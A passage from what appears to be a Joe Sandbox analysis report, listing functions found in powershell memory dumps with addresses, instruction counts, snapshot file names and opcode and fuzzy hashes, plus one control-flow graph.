                                • Instruction Fuzzy Hash: 70611671E002488FCB15DFA9D584ADDFFF5EF88314F24816AE819AB254EB34AD41CB60
                                Function 04E77728 Relevance: .2, Instructions: 154COMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 970 4e77728-4e7775e 973 4e77767-4e77770 970->973 974 4e77760-4e77762 970->974 977 4e77772-4e77774 973->977 978 4e77779-4e77797 973->978 975 4e77811-4e77816 974->975 977->975 981 4e7779d-4e777a1 978->981 982 4e77799-4e7779b 978->982 983 4e777a3-4e777a8 981->983 984 4e777b0-4e777b7 981->984 982->975 983->984 985 4e77817-4e77848 984->985 986 4e777b9-4e777e2 984->986 996 4e7784e-4e778a5 985->996 997 4e778ca-4e778ce 985->997 989 4e777e4-4e777ee 986->989 990 4e777f0 986->990 992 4e777f2-4e777fe 989->992 990->992 998 4e77804-4e7780b 992->998 999 4e77800-4e77802 992->999 1006 4e778a7 996->1006 1007 4e778b1-4e778bf 996->1007 1010 4e778d1 call 4e7791a 997->1010 1011 4e778d1 call 4e77928 997->1011 998->975 999->975 1001 4e778d4-4e778d9 1006->1007 1007->997 1009 4e778c1-4e778c9 1007->1009 1010->1001 1011->1001
                                Memory Dump Source
                                • Source File: 00000011.00000002.2177999075.0000000004E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E70000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_4e70000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: a0233bef309952353fa4b50f58032e322a02db87a794dd0c0425800322567faa
                                • Instruction ID: 9e593ea9e9e1ed8acd1c8e83264c0aafd2035fa79d54b414b2d80dbdff6a1419
                                • Opcode Fuzzy Hash: a0233bef309952353fa4b50f58032e322a02db87a794dd0c0425800322567faa
                                • Instruction Fuzzy Hash: EF51CF357042159FD714DB69D844A6A7BEAFFC8325B1488B9D50ACB391EB39FC01CBA0
                                Function 04E7BAB0 Relevance: .1, Instructions: 148COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000011.00000002.2177999075.0000000004E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E70000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_4e70000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 71bf1a324335d7be791f3e954e1fe8528cb37ba6e65360dc246f0099c6746b4a
                                • Instruction ID: 3809499b4c74d905120a3e143ffd7c18bcad549af1b21a257b68d0cc9ef4fa11
                                • Opcode Fuzzy Hash: 71bf1a324335d7be791f3e954e1fe8528cb37ba6e65360dc246f0099c6746b4a
                                • Instruction Fuzzy Hash: 26513771E012488FCB14DFA9D584A9DFFF6FF88314F14806AE819AB364EB34A845CB50
                                Function 07BC3CCC Relevance: .1, Instructions: 123COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000011.00000002.2204498454.0000000007BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07BC0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_7bc0000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 78458737c5bed32a6e71a8aa3074341444df090f1c75d7fc2fc64d7569e001aa
                                • Instruction ID: 12f651534aba45acd34fef46e73ee13985fd630f53bd2f6c040fca8fdff7fa8c
                                • Opcode Fuzzy Hash: 78458737c5bed32a6e71a8aa3074341444df090f1c75d7fc2fc64d7569e001aa
                                • Instruction Fuzzy Hash: 5541F1F1A002038BEB25CE28C5406AA7BE2EB84708F55C4EED9009F256D735D945CBB6
                                Function 04E72B00 Relevance: .1, Instructions: 108COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000011.00000002.2177999075.0000000004E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E70000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_4e70000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: fbcb13a8ecb866a143a7232af7628da653a8ba2a4c3c9ed4ab939994f05bf9a7
                                • Instruction ID: 14a8296f04c370772bfead8f35ad3d3a391d69783357f34ccb1abe738f4a784c
                                • Opcode Fuzzy Hash: fbcb13a8ecb866a143a7232af7628da653a8ba2a4c3c9ed4ab939994f05bf9a7
                                • Instruction Fuzzy Hash: B24138B4A00505DFCB05CF59C5D89AAFBB1FF48324B218599D955AB364C732FC91CBA0
                                Function 04E7C388 Relevance: .1, Instructions: 101COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000011.00000002.2177999075.0000000004E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E70000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_4e70000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 4c1a0a2dcabf4c6f2da2f6a80a75b7cef680c0112b2c1a0c740a8e2b12e7c732
                                • Instruction ID: 909efa1b477e689e930d0ba23eee8503e7a3617e497e9f2dc128a3826c928bad
                                • Opcode Fuzzy Hash: 4c1a0a2dcabf4c6f2da2f6a80a75b7cef680c0112b2c1a0c740a8e2b12e7c732
                                • Instruction Fuzzy Hash: 8C3190353046019FD709EB78E844B9AB7AAEFC4215F108539D50ACB365DF75A805CBA1
                                Function 04E76FB9 Relevance: .1, Instructions: 93COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000011.00000002.2177999075.0000000004E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E70000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_4e70000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: edd595217b79ca877419b0f866d6c477926cc1efbe2483a75a3fcc9aa86a1541
                                • Instruction ID: a075570d7592a0228554ed993855b390d1db793885fea786935381b26bdd597b
                                • Opcode Fuzzy Hash: edd595217b79ca877419b0f866d6c477926cc1efbe2483a75a3fcc9aa86a1541
                                • Instruction Fuzzy Hash: F1310E34B002058FDB14DFA9C598AAEBBF1AF8D325F149098D406AB355DB31EC01DB50
                                Function 04E7AE60 Relevance: .1, Instructions: 87COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000011.00000002.2177999075.0000000004E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E70000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_4e70000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 5b9272f859994c21bc75cc5a47d5769651ee14ca835185989f9c93ab2f266e7b
                                • Instruction ID: e207f4b565894fa438590a15bbaca5f2baa0d2bee3e92f8dbf604e63acbe28d3
                                • Opcode Fuzzy Hash: 5b9272f859994c21bc75cc5a47d5769651ee14ca835185989f9c93ab2f266e7b
                                • Instruction Fuzzy Hash: 66314B70A002099FDB08EFA9D494AAEBBF6EF88314F149079E405EB355EB349C41CB55
                                Function 04E7AE70 Relevance: .1, Instructions: 84COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000011.00000002.2177999075.0000000004E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E70000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_4e70000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: c3048c7a996b21812bb313365266b5956bb914b40321c05c69adcaaab8a33d4e
                                • Instruction ID: 5dbca0286e39ad82d9e41ae36957d02b3b9aa964b2009f5ae5bd4121d2344df9
                                • Opcode Fuzzy Hash: c3048c7a996b21812bb313365266b5956bb914b40321c05c69adcaaab8a33d4e
                                • Instruction Fuzzy Hash: B5312C70A002099FDB08EFA9D5947AEBAF6EF88314F149039E405EB354EB349C418B65
                                Function 04E7AD28 Relevance: .1, Instructions: 81COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000011.00000002.2177999075.0000000004E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E70000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_4e70000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 5e6fc56c4fd9a41ee6af45ad03fed6e785f53189ba2f146144858cb8578ad990
                                • Instruction ID: ccd3be32673d1bed590ceef6758041f3f35a105218fabf38c83e22eddb95100a
                                • Opcode Fuzzy Hash: 5e6fc56c4fd9a41ee6af45ad03fed6e785f53189ba2f146144858cb8578ad990
                                • Instruction Fuzzy Hash: 10317EB8A002059FDB04EFA4D494AAEBBB2EF84300F5584BDC115BF395DA78AD41CF65
                                Function 04E7AD38 Relevance: .1, Instructions: 77COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000011.00000002.2177999075.0000000004E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E70000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_4e70000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: b9d56c0ec80f40f0942949988113d055aa80e7e6c67f84dd1038f9f93d077ed6
                                • Instruction ID: 7b91672c242958832f86e7b3ff6fcea996eb0b2ac8193cff7376bda5b9dd377c
                                • Opcode Fuzzy Hash: b9d56c0ec80f40f0942949988113d055aa80e7e6c67f84dd1038f9f93d077ed6
                                • Instruction Fuzzy Hash: ED3180B8A002099FDB04EFA4D454AAE7BB6EF84700F51847DC114BF395DA38ED018F65
                                Function 0342F3D8 Relevance: .1, Instructions: 76COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000011.00000002.2175937247.000000000342D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0342D000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_342d000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: fca75f60ace1af4fe33480111f5254bdc1335d22fd664a2cb3100be2a2e040c3
                                • Instruction ID: 87f7bfee0b2d3cb7b389037d81eeec845f17a2aec2fa0fc9a86f5442e01b216e
                                • Opcode Fuzzy Hash: fca75f60ace1af4fe33480111f5254bdc1335d22fd664a2cb3100be2a2e040c3
                                • Instruction Fuzzy Hash: 3821EF71508200EFCB05CF54D980B26BF75FB98314FA4C5AAE9091E356C37AC45ACBA1
                                Function 04E793F0 Relevance: .1, Instructions: 75COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000011.00000002.2177999075.0000000004E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E70000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_4e70000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: fde6d001a3f3247ede87695694d0a42c8b92ca18f6376bb903b59fd19b0156ba
                                • Instruction ID: ce8306bb23d817cb0db21557b7aa2383f0aebd0916b46543ec86905efa3f1dd3
                                • Opcode Fuzzy Hash: fde6d001a3f3247ede87695694d0a42c8b92ca18f6376bb903b59fd19b0156ba
                                • Instruction Fuzzy Hash: C931ADB1A053449EEB60CF6AC08878AFFF2EF89324F28C41DC44D9B246D674A441CB61
                                Function 0342F02C Relevance: .1, Instructions: 72COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000011.00000002.2175937247.000000000342D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0342D000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_342d000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: d3b22d0fa2d5504fe990cdfd65101de4a22a2767c9fabc4d0749895940bc17f5
                                • Instruction ID: 4bc29d1426f0fafe0ab1ce274aa31883b00c424b051898c86626bf1a033bb1d0
                                • Opcode Fuzzy Hash: d3b22d0fa2d5504fe990cdfd65101de4a22a2767c9fabc4d0749895940bc17f5
                                • Instruction Fuzzy Hash: 452100715042009FCB14CF24C980B26BFB9EB88314FA4C5AAD90A5F356C33AD80ACA61
                                Function 04E79400 Relevance: .1, Instructions: 69COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000011.00000002.2177999075.0000000004E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E70000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_4e70000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 9d251128daa1f0cc8388381fd9cedab5eb7f969aa5bc7f4ee14980c3f47c22dd
                                • Instruction ID: e6801134df5ec7061d2815dde3b9ddbf08a68ae3415cb1eb0d36ee0fba73227d
                                • Opcode Fuzzy Hash: 9d251128daa1f0cc8388381fd9cedab5eb7f969aa5bc7f4ee14980c3f47c22dd
                                • Instruction Fuzzy Hash: D5217CB1A057448EEB60DF6AC08878AFFF6EF89324F28C41ED80D97246D6746481CF61
                                Function 04E77664 Relevance: .1, Instructions: 62COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000011.00000002.2177999075.0000000004E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E70000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_4e70000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: d4bf3593d85b783a7207a35c2d9030470807e12f85469905cbf600f588000ce8
                                • Instruction ID: 09ca8320977cb7208e3fc4948ed526c7391f05dd806669a8b241eafe667e8b76
                                • Opcode Fuzzy Hash: d4bf3593d85b783a7207a35c2d9030470807e12f85469905cbf600f588000ce8
                                • Instruction Fuzzy Hash: 9611F13A7001188FCB04DFADD9409AD77F6FBCC265B0540A5E509DB325DB35ED158B90
                                Function 0342F3D3 Relevance: .1, Instructions: 57COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000011.00000002.2175937247.000000000342D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0342D000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_342d000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 057d58c605ff61dcea1d2f362fa95e4b0c0d59dde82fc64a3d1dc629ed531e57
                                • Instruction ID: 01cab901b4b4578e9ab4ad90a08933e995716fcd3dcd14dbba0d910df9a0e961
                                • Opcode Fuzzy Hash: 057d58c605ff61dcea1d2f362fa95e4b0c0d59dde82fc64a3d1dc629ed531e57
                                • Instruction Fuzzy Hash: 5221AC76504240DFCB06CF10D9C4B16BF72FB88314F28C5AAD9494E756C33AD46ACBA1
                                Function 04E7C345 Relevance: .1, Instructions: 53COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000011.00000002.2177999075.0000000004E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E70000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_4e70000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 981b75918bc8b2846aaec72e58916eb34149ec34caf378463cb0d42b6ca51427
                                • Instruction ID: 10f47aa3565e914fd081d6352afbb70507aca2fe7e572919edec360e5d4180b3
                                • Opcode Fuzzy Hash: 981b75918bc8b2846aaec72e58916eb34149ec34caf378463cb0d42b6ca51427
                                • Instruction Fuzzy Hash: 65012D3120E3D21FD31797385864AA67FB1AF43214F0A40EBC8C4CF1E3D955880AC3A1
                                Function 0342F027 Relevance: .1, Instructions: 53COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000011.00000002.2175937247.000000000342D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0342D000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_342d000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 1c630ef97dc4b8389091dc56a6dd1508d93e44345cafe45a147f51fb8e987ca5
                                • Instruction ID: 297381b443749e548700237439258bceca24ffcb2859f63ce43a8b40658f7eb0
                                • Opcode Fuzzy Hash: 1c630ef97dc4b8389091dc56a6dd1508d93e44345cafe45a147f51fb8e987ca5
                                • Instruction Fuzzy Hash: 9B118B75504280DFDB16CF14D5C4B16BFB1FB84224F68C6AAD8494F756C33AD44ACB62
                                Function 04E7BCE0 Relevance: .1, Instructions: 52COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000011.00000002.2177999075.0000000004E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E70000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_4e70000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 59bb958517224349252801ad2cc0a4be7721acd360126819beda1ece812c8bdf
                                • Instruction ID: 607320b1781e97dbfaa3b9d9af36710ca955301a8494424b3e7e8edecaf12c2d
                                • Opcode Fuzzy Hash: 59bb958517224349252801ad2cc0a4be7721acd360126819beda1ece812c8bdf
                                • Instruction Fuzzy Hash: 981126316083445FC715CB39C854A5A7FF0EF45220F0888EED089CB6A3DB20F845C701
                                Function 04E7DE98 Relevance: .0, Instructions: 48COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000011.00000002.2177999075.0000000004E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E70000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_4e70000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: d9b5f75cf5dcece2cade3c26038ca4f76d3e0add68c21120aa20c9644d2aba8d
                                • Instruction ID: 0db590474366b08eaff7fbeb81d6d1aefa2e607608a867fab3524da7cf9b0686
                                • Opcode Fuzzy Hash: d9b5f75cf5dcece2cade3c26038ca4f76d3e0add68c21120aa20c9644d2aba8d
                                • Instruction Fuzzy Hash: 43018C35B082149FCF11AFB4E808AAEBBF5FB88215B10406DE50AD3242DB32A911CB90
                                Function 04E7DFD0 Relevance: .0, Instructions: 48COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000011.00000002.2177999075.0000000004E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E70000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_4e70000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 664ba8445b8eee37283c832ac53728d48e079df0b70f2db25f4dc8717fa29ae9
                                • Instruction ID: 3fdd0c29c603177c70e4b72ae600ec593012f837403b9a45ba8d3434cd99549b
                                • Opcode Fuzzy Hash: 664ba8445b8eee37283c832ac53728d48e079df0b70f2db25f4dc8717fa29ae9
                                • Instruction Fuzzy Hash: A01105342047508FC728DF79D49186ABBF6EF8931936089ADD48A8B7A1DB36FC45CB50
                                Function 0342D006 Relevance: .0, Instructions: 45COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000011.00000002.2175937247.000000000342D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0342D000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_342d000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 423db8e59490ea9f440811c33494995c066ac0c07c6c3c8837904247e972f10d
                                • Instruction ID: fb07a03ba87fcadc3a64779a4cd4683f6c2d09f2150df414882ab8b68b77d80a
                                • Opcode Fuzzy Hash: 423db8e59490ea9f440811c33494995c066ac0c07c6c3c8837904247e972f10d
                                • Instruction Fuzzy Hash: 1B01807140E3C09ED7128B258894B52BFB8EF47224F0DC0DBD9888F2A3C2695844C776
                                Function 0342D01D Relevance: .0, Instructions: 45COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000011.00000002.2175937247.000000000342D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0342D000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_342d000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: db3c3622cc2edac2fc6b4b4f71da31b365fe80ada829c5b2cf24a82ebabeeb0a
                                • Instruction ID: af491a04be801b10f580446dab52e8f4ee4f2e37a79f3767d0e4409bffe0bc7c
                                • Opcode Fuzzy Hash: db3c3622cc2edac2fc6b4b4f71da31b365fe80ada829c5b2cf24a82ebabeeb0a
                                • Instruction Fuzzy Hash: C301F7318043109AE720CA15CD84B67FF9CEF47328F5CC46BED686E256C2799842CAB9
                                Function 04E7BF10 Relevance: .0, Instructions: 44COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000011.00000002.2177999075.0000000004E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E70000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_4e70000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: fad6dcd6785f0b87a91dafe3e5b04aa8c3f2b1433e343629fe72ed1ef38b21b0
                                • Instruction ID: 580b88ec3d4347971b30525357f4c9f935ab6e69227cee72981d225476c1b937
                                • Opcode Fuzzy Hash: fad6dcd6785f0b87a91dafe3e5b04aa8c3f2b1433e343629fe72ed1ef38b21b0
                                • Instruction Fuzzy Hash: 60F081313093A16FD7068A799C5496BBFE99B8652170944ABF584CB3A2CA60C9048760
                                Function 04E7C4C0 Relevance: .0, Instructions: 40COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000011.00000002.2177999075.0000000004E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E70000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_4e70000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 95c7019c5e78fad88a006d9f06cb98e8c237dd0f717b27d4c5d1e331d850d58c
                                • Instruction ID: 4dc3352db1c6f95ed0e713776ad29d0e5c6b46a094f909f81c1c62a8deea7276
                                • Opcode Fuzzy Hash: 95c7019c5e78fad88a006d9f06cb98e8c237dd0f717b27d4c5d1e331d850d58c
                                • Instruction Fuzzy Hash: 47F04C342043506FC306E738D85086ABFA6EFC221574889BEC188DF366DE35AC09C7A0
                                Function 04E7CB52 Relevance: .0, Instructions: 39COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000011.00000002.2177999075.0000000004E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E70000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_4e70000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: c80887631cde51667c50ddd8b44ada5991c6810ab2620f15e9ed345adc0371c5
                                • Instruction ID: 6e1f95f0e6c4a854075b8d6f6a27fbf28130ec4a5f5f81eddb6b22d466684512
                                • Opcode Fuzzy Hash: c80887631cde51667c50ddd8b44ada5991c6810ab2620f15e9ed345adc0371c5
                                • Instruction Fuzzy Hash: F5F0E93424D3501FC71BA6296C9185E7FEADEC2111759497BD089DF566CE285C0BC371
                                Function 04E77940 Relevance: .0, Instructions: 38COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000011.00000002.2177999075.0000000004E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E70000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_4e70000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 01e184e4154125dc4c179ff591257be99e07287f5e06d8d2bab1532e77da3b0c
                                • Instruction ID: 0c7380f5c8cff136f965e562dfab39e74f98cf4fca3c35f9b72fe681e0baad78
                                • Opcode Fuzzy Hash: 01e184e4154125dc4c179ff591257be99e07287f5e06d8d2bab1532e77da3b0c
                                • Instruction Fuzzy Hash: 3DF0F6717012105FD7148B69D844F6F7BE9EFC8221B10062DE049D7380DE34AC05CB60
                                Function 0342D9A7 Relevance: .0, Instructions: 37COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000011.00000002.2175937247.000000000342D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0342D000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_342d000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 0ba482d1694c4eed0c143cfb920f074c5a117183488c3f0b9887517e3bed9a36
                                • Instruction ID: 55a23366d6a2f5ec950e592bfbafc1c7695f5bae6bda71a30bcbdf9e592a7d21
                                • Opcode Fuzzy Hash: 0ba482d1694c4eed0c143cfb920f074c5a117183488c3f0b9887517e3bed9a36
                                • Instruction Fuzzy Hash: 39F04476600600AFD720CF0AC984C23FBADEFC4630719C49AE84A8B712C631EC42CEA0
                                Function 04E790D8 Relevance: .0, Instructions: 35COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000011.00000002.2177999075.0000000004E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E70000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_4e70000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 4c76a5769de479b822bf463c7e6d639719be5130fcf0e69d447e756deaf94d50
                                • Instruction ID: 6878cbaa4c25869c01a9491bf587f9369483c2096608da0cf28069b624d10fbd
                                • Opcode Fuzzy Hash: 4c76a5769de479b822bf463c7e6d639719be5130fcf0e69d447e756deaf94d50
                                • Instruction Fuzzy Hash: E8F0C2357082504FE705EB74D0183AB7BA2DFC5318F1481AFC51A9F282CE396946CBA1
                                Function 04E7DE38 Relevance: .0, Instructions: 34COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000011.00000002.2177999075.0000000004E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E70000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_4e70000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: bdfc465dc799d237ec17d44e66d9bc875434e4355ee8114f40e81405e0877ee0
                                • Instruction ID: 5fc3b197275e2441b70cbeba4efeebb35a5d93eebb184b74e34edab77fe3233c
                                • Opcode Fuzzy Hash: bdfc465dc799d237ec17d44e66d9bc875434e4355ee8114f40e81405e0877ee0
                                • Instruction Fuzzy Hash: 31F05E387051909FC3119B2CD895CB6BBF5AFCA32931910EAE085CB372CA61DC02CB91
                                Function 04E77950 Relevance: .0, Instructions: 33COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000011.00000002.2177999075.0000000004E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E70000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_4e70000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: bd7948f3de75523730d63cdee61dbaa8a9cb223dba127d4411a3a29b42384a53
                                • Instruction ID: dd94cf4c22397c049b714c2c4beea1921466aabc476843cd4458dee85f87d7f4
                                • Opcode Fuzzy Hash: bd7948f3de75523730d63cdee61dbaa8a9cb223dba127d4411a3a29b42384a53
                                • Instruction Fuzzy Hash: 74F082717006149FD7149B5AE844E6FB7E9EB88675B10092DE109D7340DF74AC018BA4
                                Function 0342D998 Relevance: .0, Instructions: 33COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000011.00000002.2175937247.000000000342D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0342D000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_342d000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: e8a12ddf4493bbc178f29576852198e83bbcd01c7bebfea20634d2b4f5d6eadc
                                • Instruction ID: 18bac0ed735a0b4da2cfd524c0592d758e84d7961ba23fc944ce75744848ca9d
                                • Opcode Fuzzy Hash: e8a12ddf4493bbc178f29576852198e83bbcd01c7bebfea20634d2b4f5d6eadc
                                • Instruction Fuzzy Hash: 5FF0FF75500640AFD715CF06C985D23BBB9EB85620B198489B85A9B712C631FC42CF60
                                Function 04E7C4D0 Relevance: .0, Instructions: 32COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000011.00000002.2177999075.0000000004E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E70000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_4e70000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 3cf81d51113e4f291c97337bf9cc602becbee3e8c15804e4f75591dc9e1420ef
                                • Instruction ID: de4c79625af7069de558a48c211b0935ea8084db3e77c26b0bbdeb80121dbfed
                                • Opcode Fuzzy Hash: 3cf81d51113e4f291c97337bf9cc602becbee3e8c15804e4f75591dc9e1420ef
                                • Instruction Fuzzy Hash: F1F089352003145FC304EA25D94195ABBA9EFC1655740897ED14D5F714DE35FC05C7A4
                                Function 04E7767F Relevance: .0, Instructions: 31COMMON
